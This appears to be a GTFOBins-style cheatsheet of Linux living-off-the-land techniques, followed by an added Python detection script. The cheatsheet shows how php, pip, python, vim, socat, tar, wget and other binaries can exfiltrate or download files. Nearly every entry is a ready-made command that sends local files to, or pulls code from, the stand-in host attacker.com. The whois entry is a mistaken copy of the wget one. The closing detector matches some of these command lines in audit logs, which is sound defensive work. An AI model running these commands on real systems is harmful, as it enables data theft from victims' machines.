export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
  • pip

File upload.

It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
pip install $TF
  • Serve files in the local folder running an HTTP server.
export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF

File download.

It can download remote files. Fetch a remote file via HTTP GET request. It needs an absolute local file path.

export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' > $TF/setup.py
pip install $TF
  • python

File upload.

It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
    
  • Serve files in the local folder running an HTTP server.

    export LPORT=8888
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
    

File download.

It can download remote files.

  • Fetch a remote file via HTTP GET request.

    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])'
    
  • Ruby

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.

export LPORT=8888
ruby -run -e httpd . -p $LPORT

File download. It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
ruby -e 'require "open-uri"; download = URI.open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'
  • rvim

File upload. It can exfiltrate files on the network.

- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

```
export URL=http://attacker.com/
export LFILE=file_to_send
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
```

- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.

```
export LPORT=8888
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
```

- Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.

```
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
rvim -c ':lua local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
```

File download.

It can download remote files.

  • This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.

    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    rvim -c ':py import vim,sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])
    vim.command(":q!")'
    
  • Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.

    export LPORT=12345
    export LFILE=file_to_save
    rvim -c ':lua local k=require("socket");
    local s=assert(k.bind("*",os.getenv("LPORT")));
    local c=s:accept();
    local d,x=c:receive("*a");
    c:close();
    local f=io.open(os.getenv("LFILE"), "wb");
    f:write(d);
    io.close(f);'
    
  • SCP

File upload : It can exfiltrate files on the network. Send local file to a SSH server.

```
RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LPATH $RPATH
```

File Download :

It can download remote files. Fetch a remote file from a SSH server.

```
RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE
```

  • SFTP

File upload. It can exfiltrate files on the network. Send local file to a SSH server.

```
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
```

File download. It can download remote files. Fetch a remote file from a SSH server.

```
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
```

  • SMBCLIENT

File upload : It can exfiltrate files on the network. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to collect the file.

```
smbclient '\\attacker\share' -c 'put file_to_send where_to_save'
```

File download : It can download remote files. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to send the file.

```
smbclient '\\attacker\share' -c 'get file_to_get where_to_save'
```

  • socat

File upload. It can exfiltrate files on the network.

Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,create on the attacker box to collect the file.

```
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
socat -u file:$LFILE tcp-connect:$RHOST:$RPORT
```

File download : It can download remote files. Run socat -u file:file_to_send tcp-listen:12345,reuseaddr on the attacker box to send the file.

```
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
```

  • SSH

File upload. It can exfiltrate files on the network. Send local file to a SSH server.

```
HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
```

File download : It can download remote files.

Fetch a remote file from a SSH server.

```
HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
```

  • tar

File upload : It can exfiltrate files on the network. This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).

```
RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_send.tar
LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
```

File download : It can download remote files.

This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).

```
RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
```

  • TFTP

File upload : It can exfiltrate files on the network. Send local file to a TFTP server.

```
RHOST=attacker.com
tftp $RHOST
put file_to_send
```

File download : It can download remote files. Fetch a remote file from a TFTP server.

```
RHOST=attacker.com
tftp $RHOST
get file_to_get
```

  • vim

File upload : It can exfiltrate files on the network.

  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
```
export URL=http://attacker.com/
export LFILE=file_to_send
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
```
  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
```
export LPORT=8888
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
```
  • Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
```
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
vim -c ':lua local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
```

File download : It can download remote files.

  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.
```
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
```
  • Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
```
export LPORT=12345
export LFILE=file_to_save
vim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
```

  • wget

File upload : It can exfiltrate files on the network.

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is; instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.

```
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
```

File download : It can download remote files. Fetch a remote file via HTTP GET request.

```
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE
```

  • whois

File upload : It can exfiltrate files on the network.

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is; instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.

```
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
```

File download : It can download remote files. Fetch a remote file via HTTP GET request.

```
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE
```
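
Seen from the monitoring side, each of the Linux techniques above leaves a recognisable process command line. The following is an added example, not part of the original cheatsheet: it matches command lines, as an execve audit record or EDR process event would show them after shell variable expansion, against five of those patterns. The rule names and the sample lines are assumptions constructed for illustration.

```python
import re
import shlex

SCRIPT_CMD = re.compile(r":(py(thon)?3?|lua)\b")   # embedded interpreter command
NET_HINT = re.compile(r"urllib|socket|http\.server|SimpleHTTPServer")

def _name(argv):
    return argv[0].rsplit("/", 1)[-1]

def editor_network_script(argv):
    # vim/rvim given -c ':py ...' or ':lua ...' whose body pulls in network modules
    scripts = [argv[i + 1] for i, a in enumerate(argv[:-1]) if a == "-c"]
    return _name(argv) in ("vim", "rvim") and any(SCRIPT_CMD.match(s) and NET_HINT.search(s) for s in scripts)

def wget_post_file(argv):
    return _name(argv) == "wget" and any(a.startswith("--post-file") for a in argv[1:])

def socat_file_tcp(argv):
    # one socat address is a file, the other a TCP endpoint
    addrs = [a.lower() for a in argv[1:]]
    return (_name(argv) == "socat" and any(a.startswith(("file:", "open:")) for a in addrs)
            and any(a.startswith(("tcp-connect:", "tcp-listen:")) for a in addrs))

def tar_rsh_command(argv):
    return _name(argv) == "tar" and any(a.startswith("--rsh-command") for a in argv[1:])

def ssh_remote_cat(argv):
    # remote command passed as one quoted argument, e.g. ssh HOST "cat > path"
    return _name(argv) == "ssh" and len(argv) > 2 and bool(re.match(r"cat\b", argv[-1]))

RULES = [editor_network_script, wget_post_file, socat_file_tcp, tar_rsh_command, ssh_remote_cat]

def classify(cmdline):
    argv = shlex.split(cmdline)
    return [rule.__name__ for rule in RULES if argv and rule(argv)]

# Constructed sample telemetry: the page's commands with variables expanded, then one benign line.
SAMPLES = [
    """rvim -c ':py import urllib.request as r
r.urlretrieve(e["URL"], e["LFILE"])'""",
    "wget --post-file=file_to_send http://attacker.com/",
    "socat -u file:file_to_send tcp-connect:attacker.com:12345",
    "tar cvf root@attacker.com:/tmp/file_to_send.tar file_to_send --rsh-command=/bin/ssh",
    "ssh user@attacker.com 'cat > file_to_save'",
    "vim -c ':set number' notes.txt",
]

def flagged(lines):
    return [(line, hits) for line in lines if (hits := classify(line))]
```

`flagged(SAMPLES)` returns the five transfer command lines with the rule each one matched and skips the plain `vim` invocation. The `ssh` rule only sees the remote command when it arrives as a single quoted argument, as it does in the commands on this page.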

Sources : -

───✱*.。:。✱*.:。✧*.。✰*.:。✧*.。:。*.。✱ ───